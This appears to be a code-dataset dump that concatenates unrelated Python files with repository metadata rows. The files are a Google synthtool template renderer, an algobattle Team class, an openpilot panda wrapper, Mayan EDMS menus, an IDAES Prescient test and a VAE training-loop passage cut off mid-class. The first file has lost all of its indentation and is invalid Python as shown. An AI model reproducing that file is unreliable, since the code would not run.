"Apache-2.0"
] | null | null | null |
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
import re
import shutil
import fnmatch
from copy import deepcopy
from pathlib import Path
from typing import Dict, List, Optional
import jinja2
from synthtool import shell, _tracked_paths
from synthtool.gcp import partials
from synthtool.languages import node
from synthtool.log import logger
from synthtool.sources import git, templates
PathOrStr = templates.PathOrStr
TEMPLATES_URL: str = git.make_repo_clone_url("googleapis/synthtool")
DEFAULT_TEMPLATES_PATH = "synthtool/gcp/templates"
LOCAL_TEMPLATES: Optional[str] = os.environ.get("SYNTHTOOL_TEMPLATES")
class CommonTemplates:
def __init__(self, template_path: Optional[Path] = None):
if template_path:
self._template_root = template_path
elif LOCAL_TEMPLATES:
logger.debug(f"Using local templates at {LOCAL_TEMPLATES}")
self._template_root = Path(LOCAL_TEMPLATES)
else:
templates_git = git.clone(TEMPLATES_URL)
self._template_root = templates_git / DEFAULT_TEMPLATES_PATH
self._templates = templates.Templates(self._template_root)
self.excludes = [] # type: List[str]
def _generic_library(self, directory: str, **kwargs) -> Path:
# load common repo meta information (metadata that's not language specific).
if "metadata" in kwargs:
self._load_generic_metadata(kwargs["metadata"])
# if no samples were found, don't attempt to render a
# samples/README.md.
if "samples" not in kwargs["metadata"] or not kwargs["metadata"]["samples"]:
self.excludes.append("samples/README.md")
t = templates.TemplateGroup(self._template_root / directory, self.excludes)
if "repository" in kwargs["metadata"] and "repo" in kwargs["metadata"]:
kwargs["metadata"]["repo"]["default_branch"] = _get_default_branch_name(
kwargs["metadata"]["repository"]
)
# TODO: migrate to python.py once old sample gen is deprecated
if directory == "python_samples":
t.env.globals["get_help"] = lambda filename: shell.run(
["python", filename, "--help"]
).stdout
result = t.render(**kwargs)
_tracked_paths.add(result)
return result
def py_samples(self, **kwargs) -> List[Path]:
"""
Handles generation of README.md templates for Python samples
- Determines whether generation is being done in a client library or in a samples
folder automatically
- Otherwise accepts manually set sample_project_dir through kwargs metadata
- Delegates generation of additional sample documents in alternate/overridden folders
through py_samples_override()
"""
# kwargs["metadata"] is required to load values from .repo-metadata.json
if "metadata" not in kwargs:
kwargs["metadata"] = {}
# load common repo meta information (metadata that's not language specific).
self._load_generic_metadata(kwargs["metadata"])
# temporary exclusion prior to old templates being migrated out
self.excludes.extend(
[
"README.rst",
"auth_api_key.tmpl.rst",
"auth.tmpl.rst",
"install_deps.tmpl.rst",
"install_portaudio.tmpl.rst",
"noxfile.py.j2",
]
)
# ensure samples will generate
kwargs["metadata"]["samples"] = True
# determine if in client lib and set custom root sample dir if specified, else None
in_client_library = Path("samples").exists()
sample_project_dir = kwargs["metadata"]["repo"].get("sample_project_dir")
if sample_project_dir is None: # Not found in metadata
if in_client_library:
sample_project_dir = "samples"
else:
sample_project_dir = "."
elif not Path(sample_project_dir).exists():
raise Exception(f"'{sample_project_dir}' does not exist")
override_paths_to_samples: Dict[
str, List[str]
] = {} # Dict of format { override_path : sample(s) }
samples_dict = deepcopy(kwargs["metadata"]["repo"].get("samples"))
default_samples_dict = [] # Dict which will generate in sample_project_dir
# Iterate through samples to store override_paths_to_samples for all existing
# override paths
for sample_idx, sample in enumerate(samples_dict):
override_path = samples_dict[sample_idx].get("override_path")
if override_path is not None:
# add absolute path to metadata so `python foo.py --help` succeeds
if sample.get("file") is not None:
path = os.path.join(
sample_project_dir, override_path, sample.get("file")
)
sample["abs_path"] = Path(path).resolve()
cur_override_sample = override_paths_to_samples.get(override_path)
# Base case: No samples are yet planned to gen in this override dir
if cur_override_sample is None:
override_paths_to_samples[override_path] = [sample]
# Else: Sample docs will be generated in README merged with other
# sample doc(s) already planned to generate in this dir
else:
cur_override_sample.append(sample)
override_paths_to_samples[override_path] = cur_override_sample
# If override path none, will be generated in the default
# folder: sample_project_dir
else:
if sample.get("file") is not None:
path = os.path.join(sample_project_dir, sample.get("file"))
sample["abs_path"] = Path(path).resolve()
default_samples_dict.append(sample)
# List of paths to tempdirs which will be copied into sample folders
result = []
# deep copy is req. here to avoid kwargs being affected
overridden_samples_kwargs = deepcopy(kwargs)
for override_path in override_paths_to_samples:
# Generate override sample docs
result.append(
self.py_samples_override(
root=sample_project_dir,
override_path=override_path,
override_samples=override_paths_to_samples[override_path],
**overridden_samples_kwargs,
)
)
kwargs["metadata"]["repo"]["samples"] = default_samples_dict
logger.debug(
f"Generating templates for samples directory '{sample_project_dir}'"
)
kwargs["subdir"] = sample_project_dir
# Generate default sample docs
result.append(self._generic_library("python_samples", **kwargs))
for path in result:
# .add() records the root of the paths and needs to be applied to each
_tracked_paths.add(path)
return result
def py_samples_override(
self, root, override_path, override_samples, **overridden_samples_kwargs
) -> Path:
"""
Handles additional generation of READMEs where "override_path"s
are set in one or more samples' metadata
"""
overridden_samples_kwargs["metadata"]["repo"][
"sample_project_dir"
] = override_path
# Set samples metadata to ONLY samples intended to generate
# under this directory (override_path)
overridden_samples_kwargs["metadata"]["repo"]["samples"] = override_samples
if root != ".":
override_path = Path(root) / override_path
logger.debug(f"Generating templates for override path '{override_path}'")
overridden_samples_kwargs["subdir"] = override_path
return self._generic_library("python_samples", **overridden_samples_kwargs)
def py_library(self, **kwargs) -> Path:
# kwargs["metadata"] is required to load values from .repo-metadata.json
if "metadata" not in kwargs:
kwargs["metadata"] = {}
        # rename variable to accommodate existing synth.py files
if "system_test_dependencies" in kwargs:
kwargs["system_test_local_dependencies"] = kwargs[
"system_test_dependencies"
]
logger.warning(
"Template argument 'system_test_dependencies' is deprecated."
"Use 'system_test_local_dependencies' or 'system_test_external_dependencies'"
"instead."
)
# Set default Python versions for noxfile.py
if "default_python_version" not in kwargs:
kwargs["default_python_version"] = "3.8"
if "unit_test_python_versions" not in kwargs:
kwargs["unit_test_python_versions"] = ["3.6", "3.7", "3.8", "3.9", "3.10"]
if "system_test_python_versions" not in kwargs:
kwargs["system_test_python_versions"] = ["3.8"]
# If cov_level is not given, set it to None.
if "cov_level" not in kwargs:
kwargs["cov_level"] = None
# Don't add samples templates if there are no samples
if "samples" not in kwargs:
self.excludes += ["samples/AUTHORING_GUIDE.md", "samples/CONTRIBUTING.md"]
# Assume the python-docs-samples Dockerfile is used for samples by default
if "custom_samples_dockerfile" not in kwargs:
kwargs["custom_samples_dockerfile"] = False
ret = self._generic_library("python_library", **kwargs)
# If split_system_tests is set to True, we disable the system
# test in the main presubmit build and create individual build
        # configs for each Python version.
if kwargs.get("split_system_tests", False):
template_root = self._template_root / "py_library_split_systests"
# copy the main presubmit config
shutil.copy2(
template_root / ".kokoro/presubmit/presubmit.cfg",
ret / ".kokoro/presubmit/presubmit.cfg",
)
env = jinja2.Environment(loader=jinja2.FileSystemLoader(str(template_root)))
tmpl = env.get_template(".kokoro/presubmit/system.cfg")
for v in kwargs["system_test_python_versions"]:
nox_session = f"system-{v}"
dest = ret / f".kokoro/presubmit/system-{v}.cfg"
content = tmpl.render(nox_session=nox_session)
with open(dest, "w") as f:
f.write(content)
return ret
def java_library(self, **kwargs) -> Path:
# kwargs["metadata"] is required to load values from .repo-metadata.json
if "metadata" not in kwargs:
kwargs["metadata"] = {}
return self._generic_library("java_library", **kwargs)
def node_library(self, **kwargs) -> Path:
# TODO: once we've migrated all Node.js repos to either having
# .repo-metadata.json, or excluding README.md, we can remove this.
if not os.path.exists("./.repo-metadata.json"):
self.excludes.append("README.md")
if "samples/README.md" not in self.excludes:
self.excludes.append("samples/README.md")
kwargs["metadata"] = node.template_metadata()
kwargs["publish_token"] = node.get_publish_token(kwargs["metadata"]["name"])
ignore_src_index = [
"yes" for f in self.excludes if fnmatch.fnmatch("src/index.ts", f)
]
        # generate root-level `src/index.ts` to export multiple versions and their default clients
if (
"versions" in kwargs
and "default_version" in kwargs
and not ignore_src_index
):
node.generate_index_ts(
versions=kwargs["versions"], default_version=kwargs["default_version"]
)
return self._generic_library("node_library", **kwargs)
def php_library(self, **kwargs) -> Path:
return self._generic_library("php_library", **kwargs)
def ruby_library(self, **kwargs) -> Path:
# kwargs["metadata"] is required to load values from .repo-metadata.json
if "metadata" not in kwargs:
kwargs["metadata"] = {}
return self._generic_library("ruby_library", **kwargs)
def render(self, template_name: str, **kwargs) -> Path:
template = self._templates.render(template_name, **kwargs)
_tracked_paths.add(template)
return template
def _load_generic_metadata(self, metadata: Dict):
"""
loads additional meta information from .repo-metadata.json.
"""
metadata["partials"] = partials.load_partials()
# Loads repo metadata information from the default location if it
# hasn't already been set. Some callers may have already loaded repo
# metadata, so we don't need to do it again or overwrite it. Also, only
# set the "repo" key.
if "repo" not in metadata:
metadata["repo"] = _load_repo_metadata()
def decamelize(value: str):
""" parser to convert fooBar.js to Foo Bar. """
if not value:
return ""
str_decamelize = re.sub("^.", value[0].upper(), value) # apple -> Apple.
str_decamelize = re.sub(
"([A-Z]+)([A-Z])([a-z0-9])", r"\1 \2\3", str_decamelize
) # ACLBatman -> ACL Batman.
return re.sub("([a-z0-9])([A-Z])", r"\1 \2", str_decamelize) # FooBar -> Foo Bar.
def _load_repo_metadata(metadata_file: str = "./.repo-metadata.json") -> Dict:
"""Parse a metadata JSON file into a Dict.
Currently, the defined fields are:
* `name` - The service's API name
* `name_pretty` - The service's API title. This will be used for generating titles on READMEs
* `product_documentation` - The product documentation on cloud.google.com
* `client_documentation` - The client library reference documentation
* `issue_tracker` - The public issue tracker for the product
* `release_level` - The release level of the client library. One of: alpha, beta, ga, deprecated
* `language` - The repo language. One of dotnet, go, java, nodejs, php, python, ruby
* `repo` - The GitHub repo in the format {owner}/{repo}
* `distribution_name` - The language-idiomatic package/distribution name
    * `api_id` - The API ID associated with the service. Fully qualified identifier used to
enable a service in the cloud platform (e.g. monitoring.googleapis.com)
* `requires_billing` - Whether or not the API requires billing to be configured on the
      customer's account
Args:
metadata_file (str, optional): Path to the metadata json file
Returns:
A dictionary of metadata. This may not necessarily include all the defined fields above.
"""
if os.path.exists(metadata_file):
with open(metadata_file) as f:
return json.load(f)
return {}
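# Illustrative only - a minimal, hypothetical .repo-metadata.json using the fields
# documented above (every value below is a placeholder, not taken from a real repo):
#
#   {
#     "name": "exampleservice",
#     "name_pretty": "Example Service",
#     "product_documentation": "https://example.com/exampleservice/docs",
#     "client_documentation": "https://example.com/python/exampleservice/latest",
#     "issue_tracker": "https://example.com/issues",
#     "release_level": "ga",
#     "language": "python",
#     "repo": "example-org/python-exampleservice",
#     "distribution_name": "example-cloud-exampleservice",
#     "api_id": "exampleservice.googleapis.com",
#     "requires_billing": true
#   }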
def _get_default_branch_name(repository_name: str) -> str:
"""Read the default branch name from the environment.
First checks environment variable DEFAULT_BRANCH_PATH. If found, it
reads the contents of the file at DEFAULT_BRANCH_PATH and returns it.
    Then checks environment variable DEFAULT_BRANCH, and returns it if found.
"""
default_branch_path = os.getenv("DEFAULT_BRANCH_PATH")
if default_branch_path:
return Path(default_branch_path).read_text().strip()
# This default should be switched to "main" once we've migrated
# the majority of our repositories:
return os.getenv("DEFAULT_BRANCH", "master")
| 42.628272
| 100
| 0.637497
|
5655dffda485a47712f676825c0040e67df59ae3
| 548
|
py
|
Python
|
algobattle/team.py
|
ImogenBits/algobattle
|
321b8a5b2ea9c92cb5c28fc2110aa41dbe25a4bb
|
[
"MIT"
] | null | null | null |
algobattle/team.py
|
ImogenBits/algobattle
|
321b8a5b2ea9c92cb5c28fc2110aa41dbe25a4bb
|
[
"MIT"
] | null | null | null |
algobattle/team.py
|
ImogenBits/algobattle
|
321b8a5b2ea9c92cb5c28fc2110aa41dbe25a4bb
|
[
"MIT"
] | null | null | null |
"""Team class, stores necessary information about a Team, such as their associated solver and generator."""
class Team:
"""Team class responsible for holding basic information of a specific team."""
def __init__(self, team_name: str, generator_path: str, solver_path: str) -> None:
self.name = str(team_name).replace(' ', '_').lower() # Lower case needed for docker tag created from name
self.generator_path = generator_path
self.solver_path = solver_path
def __str__(self) -> str:
return self.name
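# Illustrative usage (team name and paths are hypothetical):
#   team = Team("Team Rocket", "./generator", "./solver")
#   str(team)  # -> "team_rocket": lower-cased and underscored so it can be used as a docker tag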
| 39.142857
| 114
| 0.693431
|
aef3d8e90034b2de628ff8516fec2f0184e98dcf
| 557
|
py
|
Python
|
selfdrive/pandad.py
|
jeroenbbb/openpilot
|
4a2ff784f85ac87a4aa9ba8a345c2403102f960a
|
[
"MIT"
] | null | null | null |
selfdrive/pandad.py
|
jeroenbbb/openpilot
|
4a2ff784f85ac87a4aa9ba8a345c2403102f960a
|
[
"MIT"
] | null | null | null |
selfdrive/pandad.py
|
jeroenbbb/openpilot
|
4a2ff784f85ac87a4aa9ba8a345c2403102f960a
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# simple boardd wrapper that updates the panda first
import os
from panda import ensure_st_up_to_date
from common.params import Params
params = Params()
is_panda_absent = params.get("IsPandaAbsent").decode() == '1'
def main(gctx=None):
if is_panda_absent:
print ("No Panda available")
else:
ensure_st_up_to_date()
#print ("Launch boardd")
#os.chdir("boardd")
#os.execvp("./boardd", ["./boardd"])
# launch of boardd is now done in manager, this is not the right place
if __name__ == "__main__":
main()
| 20.62963
| 72
| 0.696589
|
32a2db7be723b3cd4f22eb0473031ce51cba2ccf
| 771
|
py
|
Python
|
mayan/apps/common/menus.py
|
eshbeata/open-paperless
|
6b9ed1f21908116ad2795b3785b2dbd66713d66e
|
[
"Apache-2.0"
] | 2,743
|
2017-12-18T07:12:30.000Z
|
2022-03-27T17:21:25.000Z
|
mayan/apps/common/menus.py
|
eshbeata/open-paperless
|
6b9ed1f21908116ad2795b3785b2dbd66713d66e
|
[
"Apache-2.0"
] | 15
|
2017-12-18T14:58:07.000Z
|
2021-03-01T20:05:05.000Z
|
mayan/apps/common/menus.py
|
eshbeata/open-paperless
|
6b9ed1f21908116ad2795b3785b2dbd66713d66e
|
[
"Apache-2.0"
] | 257
|
2017-12-18T03:12:58.000Z
|
2022-03-25T08:59:10.000Z
|
from __future__ import unicode_literals
from django.utils.translation import ugettext_lazy as _
from navigation import Menu
__all__ = (
'menu_about', 'menu_facet', 'menu_object', 'menu_main', 'menu_multi_item',
'menu_secondary', 'menu_setup', 'menu_sidebar', 'menu_tools', 'menu_user'
)
menu_about = Menu(icon='fa fa-info', label=_('System'), name='about menu')
menu_facet = Menu(name='object facet')
menu_object = Menu(name='object menu')
menu_main = Menu(name='main menu')
menu_multi_item = Menu(name='multi item menu')
menu_secondary = Menu(name='secondary menu')
menu_setup = Menu(name='setup menu')
menu_sidebar = Menu(name='sidebar menu')
menu_tools = Menu(name='tools menu')
menu_user = Menu(
icon='fa fa-user', name='user menu', label=_('User')
)
| 32.125
| 78
| 0.728923
|
a40c5bdbd63322a83293504d8c9a9b6ec79923d8
| 3,472
|
py
|
Python
|
idaes/tests/prescient/test_prescient.py
|
CATER-UCF/idaes-pse
|
afccbd43e56dc39d63542b4d400ac027b0ccbe84
|
[
"RSA-MD"
] | null | null | null |
idaes/tests/prescient/test_prescient.py
|
CATER-UCF/idaes-pse
|
afccbd43e56dc39d63542b4d400ac027b0ccbe84
|
[
"RSA-MD"
] | null | null | null |
idaes/tests/prescient/test_prescient.py
|
CATER-UCF/idaes-pse
|
afccbd43e56dc39d63542b4d400ac027b0ccbe84
|
[
"RSA-MD"
] | 1
|
2022-03-17T11:08:43.000Z
|
2022-03-17T11:08:43.000Z
|
#################################################################################
# The Institute for the Design of Advanced Energy Systems Integrated Platform
# Framework (IDAES IP) was produced under the DOE Institute for the
# Design of Advanced Energy Systems (IDAES), and is copyright (c) 2018-2021
# by the software owners: The Regents of the University of California, through
# Lawrence Berkeley National Laboratory, National Technology & Engineering
# Solutions of Sandia, LLC, Carnegie Mellon University, West Virginia University
# Research Corporation, et al. All rights reserved.
#
# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and
# license information.
#################################################################################
import importlib
from numbers import Number
from pathlib import Path
from typing import Dict, Union, List
import pytest
import pandas as pd
prescient_simulator = pytest.importorskip("prescient.simulator", reason="prescient (optional dependency) not available")
@pytest.fixture(scope="module")
def base_dir() -> Path:
pkg_init_path = Path(importlib.util.find_spec("idaes.tests.prescient").origin)
return pkg_init_path.parent
# define custom type for type hinting
PrescientOptions = Dict[str, Union[str, bool, Number, dict]]
class Test5Bus:
"Simple test using 5bus use case"
@pytest.fixture
def data_path(self, base_dir: Path) -> Path:
return base_dir / "5bus"
@pytest.mark.unit
def test_data_path_available(self, data_path: Path):
assert data_path.is_dir()
@pytest.fixture
def output_dir(self, tmp_path: Path) -> Path:
path = tmp_path / "5bus_output"
path.mkdir()
return path
@pytest.fixture
def prescient_options(self, data_path: Path, output_dir: Path) -> PrescientOptions:
return {
"data_path": str(data_path),
"input_format":"rts-gmlc",
"simulate_out_of_sample":True,
"run_sced_with_persistent_forecast_errors":True,
"output_directory": str(output_dir),
"start_date":"07-10-2020",
"num_days":2,
"sced_horizon":1,
"ruc_mipgap":0.01,
"reserve_factor":0.1,
"deterministic_ruc_solver":"cbc",
"deterministic_ruc_solver_options":{"feas":"off", "DivingF":"on",},
"sced_solver":"cbc",
"sced_frequency_minutes":60,
"ruc_horizon":36,
"compute_market_settlements":True,
"monitor_all_contingencies":False,
"output_solver_logs":False,
"price_threshold":1000,
"contingency_price_threshold":100,
"reserve_price_threshold":5,
}
@pytest.fixture
def run_simulator(self, prescient_options: PrescientOptions) -> None:
from prescient.simulator import Prescient
sim = Prescient()
sim.simulate(**prescient_options)
@pytest.fixture
def simulation_results_table(
self,
run_simulator,
output_dir: Path,
name: str = "overall_simulation_output.csv"
) -> pd.DataFrame:
path = output_dir / name
return pd.read_csv(path)
@pytest.mark.component
# TODO use a more specific test to validate simulation output
def test_simulation_results(self, simulation_results_table: pd.DataFrame):
assert not simulation_results_table.empty
| 34.376238
| 120
| 0.639977
|
ce4b9dfe18ec4fdea20f817d5e1055495c9feb28
| 4,566
|
py
|
Python
|
mtgx2nx/parser.py
|
Woniuke/mtgx2nx
|
141b28d0ae3b7c748a83a0ead187245b21058dd2
|
[
"MIT"
] | null | null | null |
mtgx2nx/parser.py
|
Woniuke/mtgx2nx
|
141b28d0ae3b7c748a83a0ead187245b21058dd2
|
[
"MIT"
] | null | null | null |
mtgx2nx/parser.py
|
Woniuke/mtgx2nx
|
141b28d0ae3b7c748a83a0ead187245b21058dd2
|
[
"MIT"
] | null | null | null |
import os
import xml.etree.cElementTree as ElementTree
import zipfile
import networkx as nx
class Maltego:
def __init__(self, file_path):
self.entities = dict()
self.graph = list()
self.mtgx_info = dict()
self.__parser_mtgx(file_path)
def __get_entity(self, xml_entity):
name = xml_entity.attrib['id']
entity = {
'attrib': xml_entity.attrib,
'fields': list()
}
for field in xml_entity.find('Properties').find('Fields'):
field_info = field.attrib.copy()
            default_value = field.find('DefaultValue')
            # explicit None check: an Element with no children is falsy even when it exists
            if default_value is not None:
                field_info['default_value'] = default_value.text
            sample_value = field.find('SampleValue')
            if sample_value is not None:
                field_info['sample_value'] = sample_value.text
entity['fields'].append(field_info)
self.entities[name] = entity
@staticmethod
def __get_graph(xml_entity):
def parser_node(node_xml):
mtg_ns = 'http://maltego.paterva.com/xml/mtgx'
node_id = node_xml.attrib['id']
node = dict()
for data in node_xml:
maltego_entity = data.find(f'{{{mtg_ns}}}MaltegoEntity')
if maltego_entity:
node['maltego_entity_type'] = maltego_entity.attrib['type']
for field in maltego_entity.find(f'{{{mtg_ns}}}Properties'):
name = field.attrib['name']
node[name] = field.find(f'{{{mtg_ns}}}Value').text
break
else:
continue
return node_id, node
def parser_edge(edge_xml):
mtg_ns = 'http://maltego.paterva.com/xml/mtgx'
source = edge_xml.attrib['source']
target = edge_xml.attrib['target']
edge = dict()
for data in edge_xml:
maltego_entity = data.find(f'{{{mtg_ns}}}MaltegoLink')
if maltego_entity:
edge['type'] = maltego_entity.attrib['type']
for field in maltego_entity.find(f'{{{mtg_ns}}}Properties'):
name = field.attrib['name']
edge[name] = field.find(f'{{{mtg_ns}}}Value').text
break
else:
continue
return source, target, edge
graph_ns = 'http://graphml.graphdrawing.org/xmlns'
graph = xml_entity.find(f'{{{graph_ns}}}graph')
if 'edgedefault' in graph.attrib:
graph_type = graph.attrib['edgedefault']
else:
graph_type = 'directed'
if graph_type == 'directed':
nx_graph = nx.MultiDiGraph()
else:
nx_graph = nx.MultiGraph()
nodes = graph.findall(f'{{{graph_ns}}}node')
edges = graph.findall(f'{{{graph_ns}}}edge')
nx_graph.add_nodes_from(list(map(parser_node, nodes)))
nx_graph.add_edges_from(list(map(parser_edge, edges)))
return nx_graph
@staticmethod
def __get_properties_info(version_file):
info = dict()
for line in version_file.splitlines():
if line[0] != '#':
k, v = line.split('=')
info[k] = v
return info
def __parser_mtgx(self, file_path):
zip_handler = zipfile.ZipFile(file_path)
for file in zip_handler.filelist:
filename = file.filename
if filename == 'version.properties':
self.mtgx_info.update(self.__get_properties_info(zip_handler.read(filename).decode('utf-8')))
elif filename[:6] == 'Graphs':
name = os.path.split(filename)[-1]
fname, ext = os.path.splitext(name)
if ext == '.graphml':
properties = self.__get_properties_info(
zip_handler.read(f'Graphs/{fname}.properties').decode('utf-8'))
graph = self.__get_graph(
ElementTree.fromstring(zip_handler.read(f'Graphs/{fname}.graphml').decode('utf-8'))
)
self.graph.append({
'properties': properties,
'graph': graph
})
elif filename[:8] == 'Entities':
self.__get_entity(
ElementTree.fromstring(zip_handler.read(filename).decode('utf-8'))
)
else:
continue
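# Illustrative usage (file name is hypothetical):
#   m = Maltego("investigation.mtgx")
#   m.mtgx_info          # dict parsed from version.properties
#   m.entities           # entity definitions keyed by entity id
#   m.graph[0]["graph"]  # a networkx MultiDiGraph (or MultiGraph) built from the first .graphml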
| 37.735537
| 109
| 0.52869
|
47b040316a076b263c5d5179d85a8b2a22bc7133
| 21,389
|
py
|
Python
|
vae/loop_tools.py
|
kiwi0fruit/jats-semi-supervised-pytorch
|
67e9bb85f09f8ef02e17e495784d1d9a71c3adec
|
[
"MIT"
] | null | null | null |
vae/loop_tools.py
|
kiwi0fruit/jats-semi-supervised-pytorch
|
67e9bb85f09f8ef02e17e495784d1d9a71c3adec
|
[
"MIT"
] | null | null | null |
vae/loop_tools.py
|
kiwi0fruit/jats-semi-supervised-pytorch
|
67e9bb85f09f8ef02e17e495784d1d9a71c3adec
|
[
"MIT"
] | null | null | null |
from typing import Union, Tuple, Dict, List, Iterator, Any, Iterable, Callable, Optional as Opt
from dataclasses import dataclass, asdict
from abc import abstractmethod
from os import path
import math
# noinspection PyPep8Naming
from numpy import ndarray as Array
import torch as tr
from torch import Tensor
from torch.optim.optimizer import Optimizer
from torch.nn import Module
from kiwi_bugfix_typechecker import test_assert
from semi_supervised_typed.inference import DeterministicWarmup
from .display import Log
DO_EXCEPTIONS = ('id', 'len', 'start', 'end')
IntArg = Union[int, List[int]]
FloatArg = Union[float, List[float]]
StrArg = Union[str, List[str]]
TupleIntArg = Union[Tuple[int, ...], List[Tuple[int, ...]]]
test_assert()
class OutputChecker:
# noinspection PyMethodMayBeStatic,PyUnusedLocal
def check(self, guide: Any) -> bool: # pylint: disable=unused-argument,no-self-use
return True
@dataclass
class Consts:
α: float
β: float
γ: float
δ: float
ε: float
η: float
λ: float
μ: float
ρ: float
τ: float
ω: float
@dataclass
class ConstsIterators:
α: Iterator[float]
β: Iterator[float]
γ: Iterator[float]
δ: Iterator[float]
ε: Iterator[float]
η: Iterator[float]
λ: Iterator[float]
μ: Iterator[float]
ρ: Iterator[float]
τ: Iterator[float]
ω: Iterator[float]
def get_consts(self):
return Consts(α=next(self.α), β=next(self.β), γ=next(self.γ), δ=next(self.δ), ε=next(self.ε), η=next(self.η),
λ=next(self.λ), μ=next(self.μ), ρ=next(self.ρ), τ=next(self.τ), ω=next(self.ω))
@dataclass
class Do:
"""
Single value should not be a list.
List given would always mean series of values.
Non-list values (even tuples) would be converted to [value].
"""
id: int = -1
epochs: IntArg = 40
batch_size: IntArg = 64
iters_per_epoch: IntArg = -1
len: int = 1
formula: StrArg = ''
anneal_epochs: IntArg = 0
start: Opt[int] = None
end: Opt[int] = None
α0: Opt[FloatArg] = None
α: FloatArg = 1
β0: Opt[FloatArg] = None
β: FloatArg = 1
γ0: Opt[FloatArg] = None
γ: FloatArg = 1
δ0: Opt[FloatArg] = None
δ: FloatArg = 1
ε0: Opt[FloatArg] = None
ε: FloatArg = 1
η0: Opt[FloatArg] = None
η: FloatArg = 1
λ0: Opt[FloatArg] = None
λ: FloatArg = 1
μ0: Opt[FloatArg] = None
μ: FloatArg = 1
ρ0: Opt[FloatArg] = None
ρ: FloatArg = 1
τ0: Opt[FloatArg] = None
τ: FloatArg = 1
ω0: Opt[FloatArg] = None
ω: FloatArg = 1
max_failure: IntArg = 15
basis_strip: TupleIntArg = ()
post_load: bool = False
model_load_skip: Tuple[str, ...] = ()
optimizer_load_skip: Tuple[str, ...] = ()
def __post_init__(self):
if self.α0 is None:
self.α0 = self.α
if self.β0 is None:
self.β0 = self.β
if self.γ0 is None:
self.γ0 = self.γ
if self.δ0 is None:
self.δ0 = self.δ
if self.ε0 is None:
self.ε0 = self.ε
if self.η0 is None:
self.η0 = self.η
if self.λ0 is None:
self.λ0 = self.λ
if self.μ0 is None:
self.μ0 = self.μ
if self.ρ0 is None:
self.ρ0 = self.ρ
if self.τ0 is None:
self.τ0 = self.τ
if self.ω0 is None:
self.ω0 = self.ω
assert self.id >= 0
if isinstance(self.iters_per_epoch, list):
assert sum(int(it <= 0) for it in self.iters_per_epoch) == 0
else:
assert self.iters_per_epoch > 0
@staticmethod
def int_(x: IntArg) -> int:
if isinstance(x, int):
return x
raise RuntimeError("Presumably Guide.get_spec(...) wasn't run.")
@staticmethod
def float_(x: Opt[FloatArg]) -> float:
if isinstance(x, (float, int)):
return x
raise RuntimeError("Presumably Guide.get_spec(...) wasn't run.")
def get_iterators(self) -> ConstsIterators:
nt, flt = self.int_, self.float_
n = nt(self.anneal_epochs) * nt(self.iters_per_epoch)
return ConstsIterators(
α=DeterministicWarmup(n=n, t_start=flt(self.α0), t_end=flt(self.α)),
β=DeterministicWarmup(n=n, t_start=flt(self.β0), t_end=flt(self.β)),
γ=DeterministicWarmup(n=n, t_start=flt(self.γ0), t_end=flt(self.γ)),
δ=DeterministicWarmup(n=n, t_start=flt(self.δ0), t_end=flt(self.δ)),
ε=DeterministicWarmup(n=n, t_start=flt(self.ε0), t_end=flt(self.ε)),
η=DeterministicWarmup(n=n, t_start=flt(self.η0), t_end=flt(self.η)),
λ=DeterministicWarmup(n=n, t_start=flt(self.λ0), t_end=flt(self.λ)),
μ=DeterministicWarmup(n=n, t_start=flt(self.μ0), t_end=flt(self.μ)),
ρ=DeterministicWarmup(n=n, t_start=flt(self.ρ0), t_end=flt(self.ρ)),
τ=DeterministicWarmup(n=n, t_start=flt(self.τ0), t_end=flt(self.τ)),
ω=DeterministicWarmup(n=n, t_start=flt(self.ω0), t_end=flt(self.ω)),
)
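# Illustrative sketch of how a Do spec is consumed (values below are made up):
# Guide.all_lists() wraps every non-excluded scalar field into a one-element list, and
# Guide.get_spec(do_id, i) picks the i-th entry (clamped to the last one) for run i, e.g.
#
#   Do(id=0, len=2, epochs=[10, 20], β0=0.0, β=1.0, anneal_epochs=5, iters_per_epoch=100)
#
# describes two runs (epochs=10, then epochs=20); within each run, get_iterators() anneals
# β from 0.0 to 1.0 over anneal_epochs * iters_per_epoch = 500 iterations via DeterministicWarmup.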
class Guide:
""" context kwarg should be provides as context=Guide.ctx(...) """
id_pref: str
models_idxs: Tuple[int, ...]
successful_models_n: int
to_do: Tuple[int, ...]
do_specs: Dict[int, Do]
successful_models: List[int]
dtype: tr.dtype
device: tr.device
model: Module
optimizer: Optimizer
print_every_epoch: int
glb_spec: Dict[str, Any]
log_stats: List[Dict[str, Any]]
_train: bool
logger: Log
output_checker: OutputChecker
epoch: int
iteration: int
context: Dict[str, Any]
_get_loader: Tuple[Callable[[Do], Iterable]]
_get_model: Tuple[Callable[[Do, Opt[Module]], Opt[Module]]]
_get_optimizer: Tuple[Callable[[Do, Module], Opt[Optimizer]]]
batch_size: int = -1
last_consts: Consts
_total_losses: Dict[str, float] = {'loss': 0.}
def __init__(self, get_model: Callable[[Do, Opt[Module]], Opt[Module]],
get_optimizer: Callable[[Do, Module], Opt[Optimizer]],
get_loader: Callable[[Do], Iterable], id_pref: Union[str, int], models_idxs: Tuple[int, ...],
successful_models_n: int, to_do: Tuple[int, ...], do_specs: Tuple[Do, ...], logger: Log,
glb_spec: Dict[str, Any], context: Dict[str, Any],
output_checker: OutputChecker=OutputChecker(), dtype: tr.dtype=tr.float,
device: tr.device=tr.device('cuda') if tr.cuda.is_available() else tr.device('cpu'),
print_every_epoch: int=10, train: bool=True):
""" context kwarg should be provides as context=Guide.ctx(...) """
self.id_pref = str(id_pref)
self.models_idxs = models_idxs
self.successful_models_n = successful_models_n
self.to_do = to_do
if len(set(do.id for do in do_specs)) != len(do_specs):
raise ValueError
self.do_specs = {do.id: self.all_lists(do) for do in do_specs}
self._train = train
self.successful_models = []
self.logger = logger
self.dtype = dtype
self.device = device
self.print_every_epoch = print_every_epoch
self.glb_spec = glb_spec
self.log_stats = []
self.output_checker = output_checker
self.epoch = 0
self.iteration = 0
self.context = context
self._get_loader = (get_loader,)
self._get_model = (get_model,)
self._get_optimizer = (get_optimizer,)
self.__post_init__()
@staticmethod
def ctx() -> Dict[str, Any]:
""" ctx method doesn't hold Liskov substitution principle """
return dict()
